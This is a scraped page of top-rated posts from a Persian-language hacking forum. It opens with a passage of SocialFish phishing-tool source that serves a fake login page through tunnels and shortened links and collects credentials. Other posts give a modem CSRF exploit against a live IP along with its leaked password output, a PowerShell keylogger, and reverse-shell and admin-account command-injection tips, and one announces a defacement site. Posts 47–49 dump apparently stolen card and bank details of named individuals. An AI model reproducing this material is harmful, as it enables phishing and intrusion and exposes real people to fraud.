ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &') sleep(7) output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True) url = str(output).strip("b ' \ n") print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN)) link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https') print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN)) print("\n") def runNgrok(): system('./Server/ngrok http 1111 > /dev/null &') while True: sleep(2) system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url') urlFile = open('ngrok.url', 'r') url = urlFile.read() urlFile.close() if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN)) link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https') print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN)) print("\n") break def runServer(): system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &") if __name__ == "__main__": try: runPEnv() def custom(): #Question where user can input custom web-link print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT)) custom = input("\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) if 'http://' or 'https://' in custom: pass else: custom = 'http://' + custom if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'): with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('<CUSTOM>', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() with open('Server/www/post.php') as f: read_data = f.read() c = read_data.replace('<CUSTOM>', custom) f = open('Server/www/post.php', 'w') f.write(c) f.close() else: with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('<CUSTOM>', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() custom() def server(): #Question where user must select server print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT)) print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT)) choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) if choice == '1': runNgrok() elif choice == '2': runServeo() else: system('clear') return server() server() multiprocessing.Process(target=runServer).start() waitCreds() except KeyboardInterrupt: end() exit(0) پتون رابط وب را در http://0.0.0.0:5:5000/ ارائه می دهد با باز کردن یک http://0.0.0.0:5000/neptune ، در نهایت با یک ورود (در آغاز SocialFish استفاده می کنید) به سیستم وارد خواهید شد. رابط وب SocialFish v3 Neptune (/ نپتون) $ grep -i "APP_SECRET" ./* -R ./core/config.py:APP_SECRET_KEY = '' ./SocialFish.py:app.secret_key = APP_SECRET_KEY و در نهایت با داشبورد مواجه شوید.
  36. 2 امتیاز
    Irancell WIMAX Modem CSRF # Exploit Title:CSRF Accounting User Password Viewer # Vendor Homepage: http://wimax.irancell.ir/Portal/Home/ # Version: WIXFMM-130 Exploit : http://192.168.1.1/ajax.cgi?action=tag_init_wimax_auth.php Result : 1;1;0;[username]@mtnirancell.com;[password];[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0 Login Page : https://ecare.irancell.ir/appmanager/sspportal/login Choose Language : English Login Type : WIMAX Username : username Password : password Test : http://2.144.196.10/ajax.cgi?action=tag_init_wimax_auth.php Result : 1;1;0;[email protected];RjdHUwiN;[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0 Login Url : https://ecare.irancell.ir/appmanager/sspportal/login Choose Language : English Login Type : WIMAX Username : Local Password : Root # 0day.today #
  37. 2 امتیاز
    عذر خواهی می کنم یه باگ ریز داشت اون رو اصلاح کردم و دوباره آپلود کردم. Nmep.rar
  38. 2 امتیاز
    با سلام با پاورشل میشه کارهای زیادی انجام داد. مثل ساخت و ایجاد keylogger این طوری میشه از برخی از مکانیزم های امنیتی به راحتی عبور کنیم. keylogger.rar
  39. 2 امتیاز
    به نام خدا با سلام این ابزار ساده می تونه برای تبدیل اعداد دسیمال به معادل باینری اون به شما کمک کنه. file.rar
  40. 2 امتیاز
    به نام خدای بزرگ با سلام خدمت اساتید کامندلت ها دارای ساختار فعل و اسم در ارتباط با یکدیگر هستند. یعنی کاری که ما می خواهیم انجام بدیم که میشه verb و اینکه کار رو برای چه کسی انجام بدیم که میشه noun مثل کامندلت Get-ChildItem که ساختار دستوری فعل و اسم به سیستم میگه آیتم های فرزند رو بگیر و نشون بده. اگه دستوری مثل ls یا dir رو در پاورشل وارد کنیم هم همین کار رو برای ما انجام میده. حالا دلیلش چیه؟ چون که این ها اسامی مستعار هستن و در واقع میانبرهایی برای اشاره به کامندلت های واقعی هستن. کامندلتی وجود داره که نام های الیاس ها یا همون اسامی مستعار رو برای من لیست می کنه. Get-Alias دونستن این کامندلت بسیار مهم هست و کار رو برای ما تا حدود زیادی راحت تر می کنه. و همچنین می تونم کامندلت معادل هر کدوم رو مشاهده کنم که هم dir و هم ls به یک کامندلت اشاره می کنند. یعنی Get-ChildItem احتیاجی به حفظ کامندلت ها نیست همین که با مفهوم کار آشنا بشید کافی هستش. این فقط یه مثال ساده بود ولی در عمل میشه کارهای فوق العاده ای با کامندلت ها انجام داد. موفق باشید.
  41. 2 امتیاز
    سلام با توجه به کد استفاده شده برخی از عبارات نامنظم و همین طور متا کاراکترها به صورت انکود شده می تونه کمک کننده باشه.
  42. 2 امتیاز
    به نام خدا با سلام یک ویدیو در مورد این موضوع تهیه کردم. Video.rar
  43. 2 امتیاز
    به نام خدا گاهي اوقات استفاده نادرست از يکسري توابع باعث ميشه که پارامترهاي ورودي توسط کاريران عادي که نبايد اجرا بشن اجرا بشن به خصوص که اين دستورات مي تونه بر روي اپليکيشن هاي وب تاثير بزاره.در نتيجه باعث اجرای مستقيم دستورات ميشه باگ Command-Execution که بعضي ها اون رو با باگ معروف sqli مقایسه می کنن که البته داراي فرقهايي با هم هستن که مهمترينش اينه که در باگ sqli ما دستورات مربوط به اس کيو ال سرور رو درون فيلدهاي آسيب پذير (شناسه ی id) اينجکت مي کنيم به ديتا بيس تا اطلاعات رو از ديتا بيس بکشيم بيرون ولي در باگ Command-Execution ما دستورات خودمون رو مستقيم به سرور يا عبارت بهتر به خود سيستم عامل اينجکت مي کنيم براي نفوذ به اين آسيب پذيري راههاي زيادي وجود داره مثلا يک شل برگشتي با nc مي تونه ايده ي خوبي باشه که داخل ويديويي که ضميمه کردم من از همين روش اسفاده کردم يا اگه وب سرور از نوع iis باشه مي تونيد با دستورات مربوط به net داس مي تونيد يک يوزر تعريف کنيد و بعد اون رو عضو گروه ادمين ويا غيره کنيد و حتي يک سري پاليسي براي بالا بردن سطح دسترسي ست کنيد و البته راههاي ديگه اي هم وجود داره.... Command-Execution.rar
  44. 2 امتیاز
    این آسیب پذیری یکی از آسیب پذیری های خطرناک هست. که به هکر اجازه ی اجرای دستورات سیستمی در سطح سیستم عامل رو میده. یک ویدیو هم در این مورد تهیه کردم. command-injection.rar
  45. 2 امتیاز
    با سلام و درود سایت zone-hc.ir با موفقیت راه‌اندازی شد این سایت درجهت رفاه‌حال دیفیسرهای ایرانی و در راستای ثبت لینکهای هک‌شده و رهایی از مشکلات ثبت لینک در سایت‌های خارجی که در این زمینه فعالیت میکنند راه‌اندازی شده، امید است که در بین شما دیفیسرهای عزیز جا باز کنه و مورد قبول و مدرکی معتبر واقع شود نوشته‌شده با ❤️
  46. 2 امتیاز
    سلام اکسپلویت نویسی مهارتی هست که طی سال ها و با تلاش و تمرین زیاد حاصل میشه. من خودم هم هنوز خیلی جای کار دارم تا به اون تجربه برسم. برای شروع بهتر هست که روی زبان C تمرکز کنید تا ذهنیت الگوریتمی پیدا کنید. همراه با اون بهتر هست اسمبلی هم یاد بگیرید چون که یادگیری اسمبلی یک اصل به شمار میره. و در مراحل بالاتر کتاب هایی مثل هنر اکسپلویت نویسی می تونه واقعا خیلی به شما کمک کنه. در ضمن تمامی لینک های مربوط به آپارات من که در انجمن قرار داده بودم حذف شده. گویا آپارات هم با من لج افتاده به خاطر این دوباره فایل رو آپلود می کنم. files.rar
  47. 2 امتیاز
    4658581064036011|032022|633|C Francke |58 New Road, Ditton|Aylesford|ME20 6AD|GB|07825718303 DOB: 30/01/1969 MMN: Nicholas Full Name: Catherine Francke Account Number: 60362859 Sort Code: 205412 IP: 86.18.184.156 Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960F/G960FXXU7DTAA) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/11.1 Chrome/75.0.3770.143 Mobile Safari/537.36 ----------- 4319356146919497 06/20 345 Anita Lonergan Rochesto ------------ 4815807348316642|02|2024|989 ----------- 4658582835294137|122021|516|S P Balachandran|33. Hadrian avenue, Dunstable|Bedfordshire|LU54SW|GB|07405551533 DOB: 05/06/1951 MMN: Nasamani Full Name: Seevaratnam Princely Balachandran Account Number: 60736902 Sort Code: 203716 IP: 84.13.51.142 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
  48. 2 امتیاز
    4319356146919497 06/20 345 Anita Lonergan Rochesto 5573491425989271|072022|772|Mr k h mcmullan|54, Riley road wath upon dearne , Riley road. Wath upon dearne |Rotherham|S637be|GB|07949822527 DOB: 05/07/1961 MMN: Bateman Full Name: Kevin Hugh mcmullan Account Number: 38728784 Sort Code: 050939 IP: 213.205.192.193 Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1
  49. 2 امتیاز
    5496276441251788|08|2021|235 5496276531810642|12|2021|001 5496276278633678|10|2021|603 5496276527767384|11|2024|383 5496276836153177|02|2022|226 5496276442767055|09|2021|135 5496276685538858|09|2021|688 5496276044558340|02|2022|506 5496276841514405|08|2024|762 5496276743233351|09|2022|237 5496276230646727|07|2024|366 5496276577113620|06|2021|738 5496276180361814|11|2024|178 5496276314511441|07|2021|233 5496276280807765|03|2023|832 5496276368231383|04|2024|100 5496276413201605|11|2021|786 5496276844626503|11|2022|804 5496276643458876|06|2024|817 CCnum:: 5326621102016366 Cvv: 509 Expm: 05 Expy: 21 Fname: Umesh Lname: Nichat Address: Mediheal Hospital amp Fertility Centre City: ELDORET State: Zip: 30100 Country: INDIA Phone: 791337728 Email: [email protected] CCnum:: 4345591011589078 Cvv: 502 Expm: 05 Expy: 25 Fname: Luis Lname: Perez Address: Peumo City: SANTIAGO DE CHILE State: Zip: 9380000 Country: CHILE Phone: 981983930 Email: [email protected] 4306140005524381|10|2021|622|UNITED STATES|bob miller|2108 windle community rd|cookeville|tn|38506| 4616752352477412|04|2020|110|UNITED STATES|Jackssel Ojeda Pernia|2146 Woodfield Dr|Columbia|SC|29223|803-306-9577|[email protected]||| 4168050000046495|04|2021|039|UNITED STATES|teri morales|4180 langdon dr|converse|tx|78109| 4737033984334683 07/21 970 Larry Tyree 8325-h arrowridge Blvd Charlotte North Carolina 28273 UNITED STATES 4763336102118111|03|2023|092|BRAZIL WITH DOB|JULIA M ALVARENGA||TAUBATE|AVENIDA Charles Schnneider|12040-000|(12) 9827-65818|[email protected]|Julia|Mendes||189.55.136.60|1974-03-30
  50. 2 امتیاز
    با سلام من سعی میکنم جوری توضیح بدم که بصورت مقاله یا کتابی نباشه: ببینید این ابزار عالی بطور ساده اگر بخوام براتون بگم عمل سرور رو برای شما انجام میده یعنی nc به عنوان سرور استفاده میشه و کلاینت با این ابزار ارتباط برقرار میکنه بطور مثال از همین ویدیو بالا: از این ابزار استفاده کرد برای گوش دادن یا Listing یعنی میاد میگه که از این ای پی و از این پورت اگر ارتباطی برقرار شد از یه سمت دیگه این ارتباط رو برای من قبول کن توضیحات کلی ---> گوش وامیسه ببینه ایا ارتباطی از جای دیگر برقرار میشه یا نه در حقیقت یه کانال ارتباطی برقرار میکنه برای وصل شدن از مبدا به مقصد پس در واقع گوش وایمیسه که هرکسی طبق ای پی و پورتی که مشخص شده ارتباط برقرار کرد اون رو قبول کنه /bin/bash هم برای اجرای کامند تو محیط terminal استفاده میشه که بشه دستورات سیستمی رو وارد کرد موفق باشید

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...